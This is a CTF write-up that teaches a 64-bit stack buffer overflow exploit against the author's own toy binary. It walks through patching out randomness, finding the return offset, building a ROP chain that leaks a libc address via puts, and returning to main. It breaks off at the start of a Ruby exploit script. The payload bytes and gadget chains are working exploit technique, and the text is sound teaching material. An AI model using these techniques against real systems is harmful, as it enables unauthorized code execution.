goto-zero: An extended intro to solving stack overflow CTF challenges

Hey all!

My husband’s company recently did an internal (commercial) CTF, and as a CTF nerd I got suckered into helping him. I thought one of the challenges had a pretty interesting solution - at least, something I hadn’t done before - and I thought I’d do a little write-up!

Because it’s a commercial CTF, I wrote my own vulnerability binary, which you can grab here. It’s much, much simpler, but has all the components I wanted. They also provided libc.so, but since I’m not actually running the challenge, you can just use your own copy.

(Note that I’m running the BSidesSF CTF again this spring, and will probably gussy up this challenge a bit and throw it in - don’t let a good challenge go unwasted!)

The challenge

The CTF challenge was a binary that listens on a network port with a pretty straight-forward stack buffer overflow in a call to fgets().

The difficult part (for me) is that the binary is very simple - there aren’t a lot of libc imports. When I design a CTF challenge, I usually find an excuse to call popen or system or something so the player has access to that address. But nothing like that in this one!

So we we have is:

A simple binary
A bit of randomness to make simple exploits difficult
A provided copy of libc.so
The overflow is in fgets() (which allows NUL bytes - see my recent rant about NUL bytes
The binary has no stack-overflow protection (ie, compiled with -fno-stack-protector or a time machine)
The binary is not compiled as a position-independent executable (PIE) - that means there’s no ASLR in the main binary and we can rely on static addresses (but there IS ASLR in the libc.so library) - we’ll talk about why that matters
The binary has symbols, so we know what functions are called

Let’s see how I approached it!

De-randomizing

(If you don’t care about how to disable the randomness for local testing, skip to the next section!)

If you run the binary I made, it asks you to type in a certain number of characters:

$ ./goto-zero
Enter 11 characters then press enter!
^C

$ ./goto-zero
Enter 14 characters then press enter!

I hate randomness when I’m hacking! If possible, I want to be able to test without having to fuss with that sorta thing. So one of the first things I did was find the code that randomizes the number. To do that, you can use Ghidra, IDA, objdump -D. I used objdump -D, which is the worst option, but is quick and free and easy to demonstrate (I also use -M intel because I prefer Intel syntax).

Basically, disassemble the binary and search for the word “rand”, and it’ll lead you to the top of the main() function:

$ objdump -M intel -D goto-zero
[...]
  4011e1:       bf 00 00 00 00          mov    edi,0x0
  4011e6:       e8 95 fe ff ff          call   401080 <time@plt>
  4011eb:       89 c7                   mov    edi,eax
  4011ed:       e8 5e fe ff ff          call   401050 <srand@plt>
  4011f2:       e8 a9 fe ff ff          call   4010a0 <rand@plt>

Seeing time() and srand() called like that tells me they’re seeding the random number generator with the current time. The register edi is the first argument to a function and eax is the return value, so what you’re seeing is essentially srand(time(0));.

What we’d like to do is get rid of all that. The easiest thing is to patch the executable to get rid of the time() call altogether, and just do srand(0). You can do that by finding the sequence of raw bytes in the binary (the middle column in that listing), and “removing” the ones you don’t want (by replacing them with 90 90 90 ... which is nop nop nop ...).

In this case, we want to remove call 401080 (which corresponds to the bytes e8 95 fe ff ff) and the following mov edi, eax (e9 c7). That way, instead of passing 0 into time(), it’ll pass 0 into the following function, srand(), and therefore always call srand(0), which means we’ll always get the same random sequence (a lot of what we do when modifying binaries is finding ways to use the tools we have to do something a little differently - we’ll see that more later).

Open the binary in a hex editor of your choice (I’m using xxd -g1 < goto-zero > goto-zero.hex), search for that sequence, and replace it with 90 90 90 90 90 90 90).

So:

000011e0: ff bf 00 00 00 00 e8 95 fe ff ff 89 c7 e8 5e fe  ..............^.
000011f0: ff ff e8 a9 fe ff ff 89 c2 89 d0 c1 f8 1f c1 e8  ................

Becomes:

000011e0: ff bf 00 00 00 00 90 90 90 90 90 90 90 e8 5e fe  ..............^.
000011f0: ff ff e8 a9 fe ff ff 89 c2 89 d0 c1 f8 1f c1 e8  ................

Then save it as a binary file again, if your hex editor doesn’t automatically do that (with xxd, you can use xxd -g1 -r < goto-zero.hex > goto-zero.patched). You’ll probably want a different name, because you’ll eventually need the old version. Also, don’t forget to chmod +x the new binary!

If you do all that, then objdump goto-hex.patched, you will see that the code has changed:

$ objdump -M intel -D goto-zero.patched
[...]
  4011e1:       bf 00 00 00 00          mov    edi,0x0
  4011e6:       90                      nop
  4011e7:       90                      nop
  4011e8:       90                      nop
  4011e9:       90                      nop
  4011ea:       90                      nop
  4011eb:       90                      nop
  4011ec:       90                      nop
  4011ed:       e8 5e fe ff ff          call   401050 <srand@plt>
  4011f2:       e8 a9 fe ff ff          call   4010a0 <rand@plt>

And when you run it, it should always pick the same number:

$ ./goto-zero.patched 
Enter 14 characters then press enter!
^C

$ ./goto-zero.patched
Enter 14 characters then press enter!
^C

$ ./goto-zero.patched
Enter 14 characters then press enter!

Note that this won’t work against a remote server, because it won’t be disabled on their end. So you either have to eventually deal with the randomness, or run your payload over and over till it doesn’t crash. :)

I find that removing little annoyances (like randomization) while reverse engineering or exploit dev can save you a TON of mental anguish, and I always suggest looking for ways to make your working environment nicer!

Stack overflow

The first thing I do when I’m allowed to input text is to input a lot of text!

Let’s try:

$ ./goto-zero.patched 
Enter 14 characters then press enter!
AAAAAAAAAAAAAA
What is your name?

BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
Good job, BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
fish: Job 1, './goto-zero.patched' terminated by signal SIGSEGV (Address boundary error)

Usually that’s a darn good indicator that you have an overflow - likely a stack overflow, particularly if it’s a CTF :)

We can verify, though! We’re going to use gdb - the GNU debugger! Here’s my config file, the important part is to use intel syntax:

$ cat ~/.gdbinit 
set disassembly-flavor intel
set pagination off
set confirm off

Here’s how you’d run goto-zero.patched in gdb (the -q is just for less output, and I added some newlines for easier reading):

$ gdb -q ./goto-zero.patched
Reading symbols from ./goto-zero.patched...
(No debugging symbols found in ./goto-zero.patched)

(gdb) run
Starting program: /home/ron/projects/ctf/goto-zero/goto-zero.patched 
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib64/libthread_db.so.1".

Enter 14 characters then press enter!

Then enter the same (long) input to see what happens:

[...]

(gdb) run

Using host libthread_db library "/lib64/libthread_db.so.1".
Enter 14 characters then press enter!
AAAAAAAAAAAAAA
What is your name?

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Good job, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Program received signal SIGSEGV, Segmentation fault.
0x000000000040127f in main ()

We can see it crashed in main()! That’s good news! To see the exact instruction it crashed on, you can use disas (to disassemble the full function) or x/i $rip (to eXamine the Instruction at rip (the instruction pointer, ie, the current address):

(gdb) disas
Dump of assembler code for function main:
   0x0000000000401196 <+0>:	push   rbp
   0x0000000000401197 <+1>:	mov    rbp,rsp
   0x000000000040119a <+4>:	sub    rsp,0x40
[...]
   0x0000000000401279 <+227>:	mov    eax,0x0
   0x000000000040127e <+232>:	leave
=> 0x000000000040127f <+233>:	ret
End of assembler dump.

disas is often a lot of output, and doesn’t work without symbols, so I usually use the x/i method:

(gdb) x/i $rip
=> 0x40127f <main+233>:	ret

However you do it, we can see it crashes at ret, which is attempting to return from main(). What ret specifically does is jump to the address on top of the stack. We can see that address with x/xg $rsp (eXamine in heX, the Giant (64-bit integer) on top of the stack (rsp)):

(gdb) x/xg $rsp
0x7fffffffe1b8:	0x4141414141414141

So it’s trying to return to 0x41414141414141 (ie, executing code at memory address 0x4141414141414141) and crashing because that is not a valid address! That means we’re successfully overwriting the return address and taking control of the program’s execution!

Putting the exploit in a file

At this point, I’m often writing a program to start generating a file, then piping that file into the program. We’ll use echo for now (note that the '' in the middle is a visual separator, it doesn’t add anything to the file):

$ echo -ne 'AAAAAAAAAAAAAA\n''AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' > test.bin

(gdb) run < test.bin
[...]

Program received signal SIGSEGV, Segmentation fault.
0x000000000040127f in main ()

(gdb) x/xg $rsp
0x7fffffffe1b8:	0x4141414141414141

Finding the return address

Next, let’s try and figure out exactly where on the stack the return address is. We can disassemble and do math, or we can bruteforce it a bit:

$ echo -ne 'AAAAAAAAAAAAAA\n''BBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRR' > test.bin

(gdb) run < test.bin
[...]

Program received signal SIGSEGV, Segmentation fault.
0x000000000040127f in main ()

(gdb) x/xg $rsp
0x7fffffffe1b8:	0x5151515150505050

According to the top of the stack, we overwrote the return address with a series of (hex) 51 and 50 which, in ascii, is P and Q. That means that the return address is where the Ps and Qs were, so that’s what we need to manipulate. If it’s not cleanly aligned (like you get 0x5251515151505050), just add or remote single characters until you get there).

Note that there are tools that can automate this for you, such as pattern_create.rb and pattern_offset.rb from the Metasploit project, but for something you only really have to do once, I prefer just doing it by hand.

Verifying

We’re pretty sure we know where in that string the return address is, but I like to verify first by trying to return to a more obvious address like 0x1122334455667788:

$ echo -ne 'AAAAAAAAAAAAAA\n''BBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOO\x88\x77\x66\x55\x44\x33\x22\x11' > test.bin

(gdb) run < test.bin
[...]

Program received signal SIGSEGV, Segmentation fault.
0x000000000040127f in main ()
(gdb) x/xg $rsp
0x7fffffffe1b8:	0x1122334455667788

Note that it’s backwards, because Intel processors are little endian - 0x1234 gets encoded to \x34\x12. Look up “endianness” if you want to know more about that, but the important part is that integers are encoded into memory “backwards”.

I’m always super paranoid, and like to do one further test. There’s a certain machine language instruction, 0xcc (in assembly it’s int 3), which is called a “debug breakpoint”. If the program ever tries to execute the 0xcc instruction, it will crash with an obvious message (something like “breakpoint trap” or “SIGTRAP”). If the program is being debugged, it passes control to the debugger and you can inspect memory or troubleshoot in other ways.

It’s usually possible to find 0xcc in some executable section, so search your output for ` cc `:

$ objdump -M intel -D goto-zero.patched | grep ' cc '
  401026:	ff 25 cc 2f 00 00    	jmp    QWORD PTR [rip+0x2fcc]        # 403ff8 <_GLOBAL_OFFSET_TABLE_+0x10>
  40119e:	89 7d cc             	mov    DWORD PTR [rbp-0x34],edi

As an important aside: see how the cc instructions are in the middle of other instructions? That’s perfectly fine, the CPU has absolutely no awareness of where an instruction starts or ends (on Intel architectures, at least - on other architectures, instructions must be aligned). We’re going to use that later!

Another quick aside: this only works if the executable wasn’t compiled as a “position-independent executable” (or PIE). The easiest way to tell that is that the executable doesn’t start at address 0. That means when it’s loaded into memory, it’s always loaded at the same address. The same isn’t true for the stack or libc.so, as we’ll see later.

Anyway, the two options for debug breakpoints are 0x401028 and 0x4011a0. Because objdump -D will mindlessly output assembly on non-executable sections, go check which sections those instructions are in:

[...]
Disassembly of section .plt:

0000000000401020 <puts@plt-0x10>:
  401020:       ff 35 ca 2f 00 00       push   QWORD PTR [rip+0x2fca]        # 403ff0 <_GLOBAL_OFFSET_TABLE_+0x8>
  401026:       ff 25 cc 2f 00 00       jmp    QWORD PTR [rip+0x2fcc]        # 403ff8 <_GLOBAL_OFFSET_TABLE_+0x10>
  40102c:       0f 1f 40 00             nop    DWORD PTR [rax+0x0]

[...]

Disassembly of section .text:

[...]

0000000000401196 <main>:
  401196:       55                      push   rbp
  401197:       48 89 e5                mov    rbp,rsp
  40119a:       48 83 ec 40             sub    rsp,0x40
  40119e:       89 7d cc                mov    DWORD PTR [rbp-0x34],edi

[...]

The first is in the .plt, which is an executable section that is used to call external libraries (and one we’ll see a little later). The second is in the .text section, which is where the bulk of the code is stored. Either will work perfectly fine, so let’s pick the one in main() because it feels better to run code in main(). We overwrite the return address with 0x4011a0, encoded in little endian (I should also note that because this is a 64-bit amd64 executable (as opposed to a 32-bit x86), addresses are 8 bytes long:

$ echo -ne 'AAAAAAAAAAAAAA\n''BBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOO\xa0\x11\x40\x00\x00\x00\x00\x00' > test.bin

$ ./goto-zero.patched < test.bin
Enter 14 characters then press enter!
What is your name?

Good job, BBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOO�@fish: Job 1, './goto-zero.patched < test.bin' terminated by signal SIGTRAP (Trace or breakpoint trap)

Crashing with SIGTRAP is what we want to see! Note that your shell might show it a little differently, this is what it looks like in Bash:

$ ./goto-zero.patched < test.bin
Enter 14 characters then press enter!
What is your name?

Good job, BBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOO�@Trace/breakpoint trap (core dumped)

Worst case, a debugger will always show it:

(gdb) run < test.bin
Starting program: /home/ron/projects/ctf/goto-zero/goto-zero.patched < test.bin
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib64/libthread_db.so.1".
Enter 14 characters then press enter!
What is your name?

Good job, BBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOO�@
Program received signal SIGTRAP, Trace/breakpoint trap.
0x00000000004011a1 in main ()

For extra bonus points, if you can find the byte sequence eb f0, that’s an infinite loop (it’s a 2 byte sequence that decodes to “jump backwards 2 bytes”), which lets you lock up an executable entirely. You can verify that a remote target is vulnerable by setting the return address to memory containing eb f0, and then seeing if the session locks up (that’s also kinda rude if it’s not your server!)

Return-oriented programming (ROP)

So remember how we used a cc instruction from the middle of another instruction? In this code:

  40119e:       89 7d cc                mov    DWORD PTR [rbp-0x34],edi

This is the first tiny little piece of “return oriented programming”, or ROP, that we’re doing. But we’re going to do a lot more!

In the olden days, systems and binaries had executable stacks. That means that if you overflowed the stack and changed the return address, you could just send code along with the updated return address and jump to that code, and you’re basically done - you’re executing arbitrary code.

Thankfully, pretty much no application in the last 20 years ships with an executable stack, even CTF challenges typically don’t (a notable exception is Citrix ADC, which runs its entire network stack including protocol parsers in a root module with an executable stack - see my writeup for cve-2023-3519). That means we need another way to execute code that we want!

The trick folks found is to use code that is already loaded in memory and executable, but to use it in a way that nobody would expect. The core idea behind ROP is that you find little bits and pieces of code (called “gadgets”) to do complete little tasks, and have each one jump to the next one by chaining them together as return addresses.

Normally, you’re doing one of two things:

Either “set a register to a value and then return to the next thing” (typically, pop / ret); or
Call an already-defined function to do a thing

Most of the time when using ROP, unless you’re getting super complex, you’re using little gadgets to set up arguments to a function, then you’re calling that function, and repeat (note that x86 and amd64 vary here - you don’t normally need to set up registers on x86 since arguments are passed on the stack, but that’s a bit beyond the scope here).

Calling conventions

So let’s talk function arguments!

Much earlier, when we saw time / srand / rand, we saw arguments being passed in edi (which is essentially rdi):

  4011e1:       bf 00 00 00 00          mov    edi,0x0
  4011e6:       e8 95 fe ff ff          call   401080 <time@plt>
  4011eb:       89 c7                   mov    edi,eax
  4011ed:       e8 5e fe ff ff          call   401050 <srand@plt>

This is what’s known as a calling convention - specifically, the calling convention used by amd64 Linux (that I have to look up every time I do this). The first four arguments to any function are passed in: rdi, rsi, rdx, then rcx, which means if you want to call a function with, say, two arguments, the first goes into rdi and the second goes into rsi.

For each of those arguments, we need to find a way to set it to a value then return again. Since you’re controlling the stack already, the easiest way to do that is with pop <reg> followed by ret.

Depending on how big the binary is, it might be easier or harder to find clean versions of these. Sometimes you’ll find pop rsi / <do a few irrelevant things> / ret. Sometimes you’ll need to chain together multiple gadgets to do a single thing. It can get very tricky, but CTFs will usually give you the tools you need.

Another thing to mention is: there are tools that will find these for you. I’ve never personally used one, though probably I should - I just look for the right sequences by hand, normally they’re pretty obvious (don’t forget to look inside other instructions, though!).

Our first ROP!

Let’s look for a pop rdi / ret instruction! We can assemble and disassemble a little program using nasm to figure out what we’re looking for:

$ cat test.asm
bits 64
pop rdi
ret

$ nasm -o test.bin test.asm

$ hexdump -C test.bin
00000000  5f c3                                             |_.|

$ ndisasm -b64 test.bin
00000000  5F                pop rdi
00000001  C3                ret

So basically, we need a 5f, followed by c3 (but not necessarily adjacent). That sequence is found quite commonly at the end of functions, so you’ll usually be able to find it pretty easily. In the toy challenge I made, I just added one after main so you don’t really have to search:

  40127f:       c3                      ret
  401280:       cc                      int3
  401281:       5f                      pop    rdi
  401282:       c3                      ret

So let’s take our payload from earlier, and instead of the debug address we’ll use the pop rdi instruction as the return address (0x401281), followed by a value that will go into rdi (0x1234567812345678). Once 0x1234567812345678 is popped into rdi, the ret will execute and whatever is next on the stack is the next return address. For that, we’ll use our debug breakpoint from earlier (0x4011a0).

All put together (once again using '' as a visual separator), we get:

$ echo -ne 'AAAAAAAAAAAAAA\n''BBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOO''\x81\x12\x40\x00\x00\x00\x00\x00''\x78\x56\x34\x12\x78\x56\x34\x12''\xa0\x11\x40\x00\x00\x00\x00\x00' > test.bin

Then run it in a debugger:

(gdb) run < test.bin
[...]
Program received signal SIGTRAP, Trace/breakpoint trap.
0x00000000004011a1 in main ()

Crashing at a SIGTRAP means we’re still ending with our debug statement - that’s good news! If you’re getting a SIGSEGV, that means you’re ending up at the wrong place. Inspecting the address you’re at (x/i $rip) and the top of the stack (x/xg $rsp) might give you hints.

If it worked, we can use print/x to print the register in heX to check what’s in rdi:

(gdb) print/x $rdi
$1 = 0x1234567812345678

We did it!

What are we doing here?

Okay, now what are we actually trying to do?

We’re trying to get code execution, but how? We mentioned that you can set up arguments and then call functions. But what functions can we actually call?

Because our binary isn’t compiled with PIE, we have a menu of functions that we can call, and we can see it with objdump -T:

$ objdump -T ./goto-zero.patched

./goto-zero.patched:     file format elf64-x86-64

DYNAMIC SYMBOL TABLE:
0000000000000000      DF *UND*	0000000000000000 (GLIBC_2.34) __libc_start_main
0000000000000000      DF *UND*	0000000000000000 (GLIBC_2.2.5) puts
0000000000000000      DF *UND*	0000000000000000 (GLIBC_2.2.5) printf
0000000000000000      DF *UND*	0000000000000000 (GLIBC_2.2.5) srand
0000000000000000      DF *UND*	0000000000000000 (GLIBC_2.2.5) fgets
0000000000000000      DF *UND*	0000000000000000 (GLIBC_2.2.5) getchar
0000000000000000  w   D  *UND*	0000000000000000  Base        __gmon_start__
0000000000000000      DF *UND*	0000000000000000 (GLIBC_2.2.5) time
0000000000000000      DF *UND*	0000000000000000 (GLIBC_2.2.5) setvbuf
0000000000000000      DF *UND*	0000000000000000 (GLIBC_2.2.5) rand
0000000000404060 g    DO .bss	0000000000000008 (GLIBC_2.2.5) stdout
0000000000404070 g    DO .bss	0000000000000008 (GLIBC_2.2.5) stdin
0000000000404080 g    DO .bss	0000000000000008 (GLIBC_2.2.5) stderr

There’s really not much there. That’s a problem. If we want to run code, we need to be able to make an arbitrary syscall, or write a file (open / write), or run a command (system), or allocate executable memory (mmap), or something else fun. None of those functions are what I’d call “fun”. So where do we find fun functions?

We find fun functions in libc.so, which unfortunately IS compiled with PIE, so we can’t just jump to it - every time the binary starts, it’s loaded to a new address.

However, PIE only means we change where we load something into memory, not what we load into memory. The layout of libc.so will always be the same once it’s loaded. That means if we can find one thing in libc.so, we can use the magic of math to find every thing.

In other words, our goal is to leak one libc.so memory address. Then suddenly, we have access to every function and gadget in libc.so!

Leaking an address

We do, thankfully, have a function that can print stuff. Several, actually! puts() is probably the easiest. As usual, I like to test things before I actually do them, so let’s look at how to test it.

Testing our leak

The first argument to puts is a string that will be printed. That means we want to set rdi to a string that, if output, would stand out.

Let’s use our pop rdi / ret gadget again, but this time instead of a recognizable number, we’ll put this memory address into rdi:

(gdb) x/s 0x402010
0x402010:       "Enter %d characters then press enter!\n"

That’ll definitely stand out! So now our call stack is:

pop rdi / ret (0x401281)
Our string (0x402010)

Next, we need to call puts(). We can find the indirect call to puts() in the .plt section:

0000000000401030 <puts@plt>:
  401030:       ff 25 ca 2f 00 00       jmp    QWORD PTR [rip+0x2fca]        # 404000 <puts@GLIBC_2.2.5>
  401036:       68 00 00 00 00          push   0x0
  40103b:       e9 e0 ff ff ff          jmp    401020 <_init+0x20>

So the third thing we put on the stack is that address - 0x401030. Now our stack is:

pop rdi / ret (0x401281)
Our string (0x402010)
puts() (0x401030)

The final thing is our old friend the debug breakpoint - that way we can make sure everything is going right - 0x4011a0. So here’s our final stack:

pop rdi / ret (0x401281)
Our string (0x402010)
puts() (0x401030)
Debug (0x4011a0)

So now encode that all into our payload, remembering that each address is encoded into 8 backwards (little endian) bytes:

$ echo -ne 'AAAAAAAAAAAAAA\n''BBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOO''\x81\x12\x40\x00\x00\x00\x00\x00''\x10\x20\x40\x00\x00\x00\x00\x00''\x30\x10\x40\x00\x00\x00\x00\x00''\xa0\x11\x40\x00\x00\x00\x00\x00' > test.bin

$ ./goto-zero.patched < test.bin
Enter 14 characters then press enter!
What is your name?

Good job, BBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOO�@Enter %d characters then press enter!

fish: Job 1, './goto-zero.patched < test.bin' terminated by signal SIGTRAP (Trace or breakpoint trap)

Well there we go! We printed out some arbitrary memory and then hit a debug breakpoint!

Do you know what else lives in arbitrary memory? Memory addresses! Remember what we needed to call a libc.so function? A memory address!

Let’s look at that .plt thing again.

Reading the linking table

Since we could call puts() from our own binary, it’s somewhat obvious that our binary has libc.so addresses somewhere! Otherwise, it wouldn’t know where to go.

The way linking and imports and stuff actually work is kinda complex - the book Practical Binary Analysis explains it better than most - but suffice to say that we can find libc.so addresses in the non-PIE binary we’re running if we know where to look.

Once again, non-objdump tools are much better at displaying these addresses, but here’s the .plt entry for puts:

0000000000401030 <puts@plt>:
  401030:       ff 25 ca 2f 00 00       jmp    QWORD PTR [rip+0x2fca]        # 404000 <puts@GLIBC_2.2.5>
  401036:       68 00 00 00 00          push   0x0
  40103b:       e9 e0 ff ff ff          jmp    401020 <_init+0x20>

The first line does some math to reference a different part of the binary. objdump helpfully does that math and says it’s 0x404000. That’s the address where the actual puts address is stored, but with a little twist: it’s only there after it’s called - the linking is done opportunistically (see Practical Binary Analysis for all the details).

When you first run the executable, before doing anything, we can print the data at 0x404000:

(gdb) run
[...]
Enter 14 characters then press enter!
^C

Program received signal SIGINT, Interrupt.
0x00007ffff7ec5e11 in __GI___libc_read (fd=0, buf=0x4056b0, nbytes=1024) at ../sysdeps/unix/sysv/linux/read.c:26
26        return SYSCALL_CANCEL (read, fd, buf, nbytes);

(gdb) x/xg 0x404000
0x404000 <puts@got.plt>:        0x0000000000401036

It stores 0x401036, which is an address in the binary itself - not in libc.so. But if we let the puts() run and then inspect it, it’s changed:

(gdb) run
[...]
Enter 14 characters then press enter!
AAAAAAAAAAAAAA
What is your name?

^C

Program received signal SIGINT, Interrupt.
0x00007ffff7ec5e11 in __GI___libc_read (fd=0, buf=0x4052a0, nbytes=1024) at ../sysdeps/unix/sysv/linux/read.c:26
26	 return SYSCALL_CANCEL (read, fd, buf, nbytes);

(gdb) x/xg 0x404000
0x404000 <puts@got.plt>:	0x00007ffff7e3c0a0

And there’s a libc.so address! You’ll recognize them because they usually start with 0x7f.

So now, let’s leak that address!

Leaking the address

Now all we have to do is take the most recent exploit we wrote, and instead of printing off “Enter %d characters then press enter!”, we print off 0x404000! It’s not going to be pretty, because it’s binary, but it should work.

Let’s update that call stack from earlier:

pop rdi / ret (0x401281)
The address we want to leak (0x404000)
puts() (0x401030)
Debug (0x4011a0)

$ echo -ne 'AAAAAAAAAAAAAA\n''BBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOO''\x81\x12\x40\x00\x00\x00\x00\x00''\x00\x40\x40\x00\x00\x00\x00\x00''\x30\x10\x40\x00\x00\x00\x00\x00''\xa0\x11\x40\x00\x00\x00\x00\x00' > test.bin

$ ./goto-zero.patched < test.bin
Enter 14 characters then press enter!
What is your name?

Good job, BBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOO�@�Q�V
fish: Job 1, './goto-zero.patched < test.bin' terminated by signal SIGTRAP (Trace or breakpoint trap)

Notice the �@�Q�V at the end? That’s the address of puts in libc.so (and, as such, it changes every time)! We can see it better with hexdump:

$ ./goto-zero.patched < test.bin | hexdump -C
00000000  45 6e 74 65 72 20 31 34  20 63 68 61 72 61 63 74  |Enter 14 charact|
00000010  65 72 73 20 74 68 65 6e  20 70 72 65 73 73 20 65  |ers then press e|
00000020  6e 74 65 72 21 0a 57 68  61 74 20 69 73 20 79 6f  |nter!.What is yo|
00000030  75 72 20 6e 61 6d 65 3f  0a 0a 47 6f 6f 64 20 6a  |ur name?..Good j|
00000040  6f 62 2c 20 42 42 42 42  43 43 43 43 44 44 44 44  |ob, BBBBCCCCDDDD|
00000050  45 45 45 45 46 46 46 46  47 47 47 47 48 48 48 48  |EEEEFFFFGGGGHHHH|
00000060  49 49 49 49 4a 4a 4a 4a  4b 4b 4b 4b 4c 4c 4c 4c  |IIIIJJJJKKKKLLLL|
00000070  4d 4d 4d 4d 4e 4e 4e 4e  4f 4f 4f 4f 81 12 40 a0  |MMMMNNNNOOOO..@.|
00000080  d0 98 ca 12 7f 0a                                 |......|

See how (other than the newline - 0a) it ends with, in reverse order, 0x7f12ca98d0a0? If we check the symbol exports for /lib64/libc.so, we’ll see that the address for puts() ends with the same number:

$ objdump -T /lib64/libc.so.6 | grep puts
00000000000840a0  w   DF .text  0000000000000206  GLIBC_2.2.5 puts

That’s a very good sign!

If we do some math, 0x7f12ca98d0a0 - 0x840a0 = 0x7f12ca909000, which is the address where libc.so was loaded on that particular execution. Now we can use that to figure out the address of any other libc.so function starting from that base address and adding the offset!

The final return

Okay, where do we want to return after we’ve leaked the address?

This is what took me a bit of time, and where I found a technique that I’d never used before (though I betcha every other CTF player has) - we can return to the top of main() and let the program have its Groundhog Day - it starts from the top, and as far as it knows, nothing has happened. You can just exploit it again, but this time we know an address in libc!

Here’s our final ROP stack (for now):

pop rdi / ret (0x401281)
The address we want to leak (0x404000)
puts() (0x401030)
main() (0x401196)

Let’s run it:

$ echo -ne 'AAAAAAAAAAAAAA\n''BBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOO''\x81\x12\x40\x00\x00\x00\x00\x00''\x00\x40\x40\x00\x00\x00\x00\x00''\x30\x10\x40\x00\x00\x00\x00\x00''\x96\x11\x40\x00\x00\x00\x00\x00' > test.bin

$ ./goto-zero.patched < test.bin
Enter 14 characters then press enter!
What is your name?

Good job, BBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOO�@Enter %d characters then press enter!

Enter 14 characters then press enter!
What is your name?

Good job, ����fish: Job 1, './goto-zero.patched < test.bin' terminated by signal SIGSEGV (Address boundary error)

See how it starts over, asks for the player’s name, etc? The whole program runs a second time. But this time, we’re ready!

And then it gets complicated…

So now, let’s make the binary into a network service:

$ ncat -e ./goto-zero.patched -k -l -p 1234

That’ll redirect stdin/stdout across the network like in a CTF challenge. We can connect to it and exploit it using nc or ncat:

$ nc -v localhost 1234
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Connected to ::1:1234.
Enter 14 characters then press enter!
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
What is your name?

Good job, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

But we don’t really get output anymore. You can debug ncat, but that gets kinda complicated (you need to set follow-fork-mode child).

$ gdb -q --args ncat -vv -e ./goto-zero.patched -l -p 1234
[...]
(gdb) set follow-fork-mode child
(gdb) run
Starting program: /usr/bin/ncat -vv -e ./goto-zero.patched -l -p 1234

In another terminal:

$ nc localhost 1234
Enter 14 characters then press enter!
AAAAAAAAAAAAAA
What is your name?

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Good job, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

And back in ncat:

Thread 2.1 "goto-zero.patch" received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0x7ffff7db5740 (LWP 438720)]
0x000000000040127f in main ()
(gdb) x/xg $rsp
0x7fffffffe178:	0x4141414141414141

A couple notes on this:

If you want to do it again, you have to restart gdb completely because it now thinks it’s the binary, not ncat
Because of how the binary is written, you can’t redirect a file, because the second the pipe closes the process terminates with SIGPIPE (the original binary isn’t like that - I didn’t notice till now and I don’t want to re-do all my examples!)

The rest of the owl

At this point, we can no longer just use a file and wave away the complexity - we need to read the libc.so value and do some math.

I’m just going to reproduce my full exploit here and try to annotate it in comments. Enjoy!

# encoding: ASCII-8BIT

require 'socket'

# Use variables for host/port so we can change them to the real target later
IP = 'localhost'
PORT = 1234
s = TCPSocket.new(IP, PORT)

# This is a rally crappy function that reads one character at a time from the
# network stream until it ends with a value or disconnects - there are better
# ways to do this, but this works so whatever
def read_until(s, p, loud: false)
  #puts "(Waiting for server to say \"#{p}\"...)"
  data = ''
  loop do
    char = s.read(1)

    if loud
      print char
    end

    if char.nil? || char == ''
      raise "Disconnected!"
    end

    data.concat(char)
    if data.end_with?(p)
      return data
    end
  end
end

# Our initial gadgets - name them so you don't get confused later!
POP_RDI_RET = 0x401281
PUTS_PLT_ENTRY = 0x404000
PUTS = 0x401030
MAIN = 0x401196
DEBUG = 0x4011a0

# Read the initial banner
